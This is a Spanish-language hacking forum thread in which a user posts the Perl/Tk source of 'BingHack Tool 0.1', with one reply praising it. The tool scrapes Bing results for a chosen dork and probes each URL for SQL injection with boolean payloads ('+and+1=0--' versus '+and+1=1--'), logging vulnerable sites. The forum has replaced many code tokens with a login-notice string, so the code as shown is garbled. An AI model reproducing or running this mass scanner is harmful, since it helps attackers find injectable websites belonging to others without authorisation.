comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Perl Tk] BingHack Tool 0.1

  • 1 Respuestas
  • 1572 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Mayo 26, 2012, 09:05:52 am »
Version Tk de un script en Perl para buscar paginas vulnerables a SQLi usando Bing.

Una imagen



El codigo

Código: Perl
  1. #!usr/bin/perl
  2. #BingHack Tool 0.1
  3. #Version Tk
  4. #Coded By Doddy H
  5.  
  6. use Tk;
  7. use LWP::UserAgent;
  8.  
  9. my $nave = LWP::UserAgent->new;
  10. $nave->agent(
  11. "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
  12. );
  13. $nave->timeout(5);
  14.  
  15. my $color_fondo = "black";
  16. my $color_texto = "green";
  17.  
  18. if ( $^O eq 'MSWin32' ) {
  19.     use Win32::Console;
  20.     Win32::Console::Free();
  21. }
  22.  
  23. my $hj =
  24.   MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
  25. $hj->geometry("600x285+20+20");
  26. $hj->resizable( 0, 0 );
  27. $hj->title("BingHack Tool 0.1");
  28.  
  29. $hj->Label(
  30.     -text       => "Dork : ",
  31.     -font       => "Impact1",
  32.     -background => $color_fondo,
  33.     -foreground => $color_texto
  34. )->place( -x => 18, -No tienes permisos para ver links. Registrate o Entra con tu cuenta => 22 );
  35. my $dork = $hj->Entry(
  36.     -width      => 30,
  37.     -background => $color_fondo,
  38.     -foreground => $color_texto
  39. )->place( -x => 68, -No tienes permisos para ver links. Registrate o Entra con tu cuenta => 26 );
  40.  
  41. $hj->Label(
  42.     -text       => "Pages : ",
  43.     -font       => "Impact1",
  44.     -background => $color_fondo,
  45.     -foreground => $color_texto
  46. )->place( -x => 270, -No tienes permisos para ver links. Registrate o Entra con tu cuenta => 22 );
  47. my $pages = $hj->Entry(
  48.     -width      => 10,
  49.     -background => $color_fondo,
  50.     -foreground => $color_texto
  51. )->place( -x => 335, -No tienes permisos para ver links. Registrate o Entra con tu cuenta => 26 );
  52.  
  53. $hj->Button(
  54.     -text             => "Search",
  55.     -width            => 10,
  56.     -background       => $color_fondo,
  57.     -foreground       => $color_texto,
  58.     -activebackground => $color_texto,
  59.     -command          => \&search
  60. )->place( -x => 420, -No tienes permisos para ver links. Registrate o Entra con tu cuenta => 26 );
  61. $hj->Button(
  62.     -text             => "Logs",
  63.     -width            => 10,
  64.     -background       => $color_fondo,
  65.     -foreground       => $color_texto,
  66.     -activebackground => $color_texto,
  67.     -command          => \&logs
  68. )->place( -x => 495, -No tienes permisos para ver links. Registrate o Entra con tu cuenta => 26 );
  69.  
  70. $hj->Label(
  71.     -text       => "Links Found",
  72.     -font       => "Impact",
  73.     -background => $color_fondo,
  74.     -foreground => $color_texto
  75. )->place( -x => 110, -No tienes permisos para ver links. Registrate o Entra con tu cuenta => 80 );
  76. my $links = $hj->Listbox(
  77.     -width      => 40,
  78.     -height     => 10,
  79.     -background => $color_fondo,
  80.     -foreground => $color_texto
  81. )->place( -x => 30, -No tienes permisos para ver links. Registrate o Entra con tu cuenta => 120 );
  82.  
  83. $hj->Label(
  84.     -text       => "SQLi Found",
  85.     -font       => "Impact",
  86.     -background => $color_fondo,
  87.     -foreground => $color_texto
  88. )->place( -x => 390, -No tienes permisos para ver links. Registrate o Entra con tu cuenta => 80 );
  89. my $founds = $hj->Listbox(
  90.     -width      => 40,
  91.     -height     => 10,
  92.     -background => $color_fondo,
  93.     -foreground => $color_texto
  94. )->place( -x => 310, -No tienes permisos para ver links. Registrate o Entra con tu cuenta => 120 );
  95.  
  96. MainLoop;
  97.  
  98. sub search {
  99.  
  100.     $links->No tienes permisos para ver links. Registrate o Entra con tu cuenta( "0.0", "end" );
  101.     $founds->No tienes permisos para ver links. Registrate o Entra con tu cuenta( "0.0", "end" );
  102.  
  103.     $hj->update;
  104.     $hj->title("BingHack Tool 0.1 [+] Status : Searching");
  105.     my @urls = bing( $dork->get, $pages->get );
  106.     $hj->update;
  107.  
  108.     for (@urls) {
  109.         $hj->update;
  110.         $links->insert( "end", $_ );
  111.     }
  112.  
  113.     $hj->title("BingHack Tool 0.1 [+] Status : Scanning");
  114.  
  115.     for my $pa (@urls) {
  116.         $hj->update;
  117.         sql($pa);
  118.     }
  119.     $hj->update;
  120.     $hj->title("BingHack Tool 0.1");
  121. }
  122.  
  123. sub logs {
  124.  
  125.     my $file = "sql-logs.txt";
  126.  
  127.     if ( -f $file ) {
  128.         No tienes permisos para ver links. Registrate o Entra con tu cuenta($file);
  129.     }
  130.     else {
  131.         $hj->Dialog(
  132.             -title            => "Error",
  133.             -buttons          => ["OK"],
  134.             -text             => "Logs not found",
  135.             -background       => $color_fondo,
  136.             -foreground       => $color_text,
  137.             -activebackground => $color_text
  138.         )->Show();
  139.     }
  140. }
  141.  
  142. sub sql {
  143.     my ( $pass1, $pass2 ) = ( "+", "--" );
  144.     my $page = No tienes permisos para ver links. Registrate o Entra con tu cuenta;
  145.  
  146.     my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
  147.     my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
  148.  
  149.     unless ( $testar1 eq $testar2 ) {
  150.         $founds->insert( "end", $page );
  151.         savefile( "sql-logs.txt", $page );
  152.     }
  153. }
  154.  
  155. sub savefile {
  156.     No tienes permisos para ver links. Registrate o Entra con tu cuenta( SAVE, ">>" . $_[0] );
  157.     No tienes permisos para ver links. Registrate o Entra con tu cuenta SAVE $_[1] . "\n";
  158.     No tienes permisos para ver links. Registrate o Entra con tu cuenta SAVE;
  159. }
  160.  
  161. sub bing {
  162.  
  163.     my ( $a, $b ) = @_;
  164.     for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
  165.         $hj->update;
  166.         my $code =
  167.           toma( "http://www.bing.com/search?q=" . $a . "&first=" . $pages );
  168.  
  169.         while ( $code =~ /<h3><a href="(.*?)"/mig ) {
  170.             No tienes permisos para ver links. Registrate o Entra con tu cuenta( @founds, $1 );
  171.         }
  172.     }
  173.     my @founds = repes( cortar(@founds) );
  174.     No tienes permisos para ver links. Registrate o Entra con tu cuenta @founds;
  175. }
  176.  
  177. sub repes {
  178.     my @limpio;
  179.     foreach $test (@_) {
  180.         No tienes permisos para ver links. Registrate o Entra con tu cuenta @limpio, $test unless $repe{$test}++;
  181.     }
  182.     No tienes permisos para ver links. Registrate o Entra con tu cuenta @limpio;
  183. }
  184.  
  185. sub cortar {
  186.     my @nuevo;
  187.     for (@_) {
  188.         if ( $_ =~ /=/ ) {
  189.             @tengo = No tienes permisos para ver links. Registrate o Entra con tu cuenta( "=", $_ );
  190.             No tienes permisos para ver links. Registrate o Entra con tu cuenta( @nuevo, @tengo[0] . "=" );
  191.         }
  192.         else {
  193.             No tienes permisos para ver links. Registrate o Entra con tu cuenta( @nuevo, $_ );
  194.         }
  195.     }
  196.     No tienes permisos para ver links. Registrate o Entra con tu cuenta @nuevo;
  197. }
  198.  
  199. sub toma {
  200.     No tienes permisos para ver links. Registrate o Entra con tu cuenta $nave->get( $_[0] )->content;
  201. }
  202.  
  203. #The End ?
  204.  
« Última modificación: Marzo 14, 2015, 10:21:35 am por Expermicid »

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #1 en: Mayo 26, 2012, 11:18:06 am »
Muy bueno Doddy  ;D
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3242
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1517
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 1142
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear
[Perl] Search in google for scan SQLI

Iniciado por BigBear

Respuestas: 0
Vistas: 1310
Último mensaje Julio 03, 2011, 09:49:49 pm
por BigBear
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1668
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d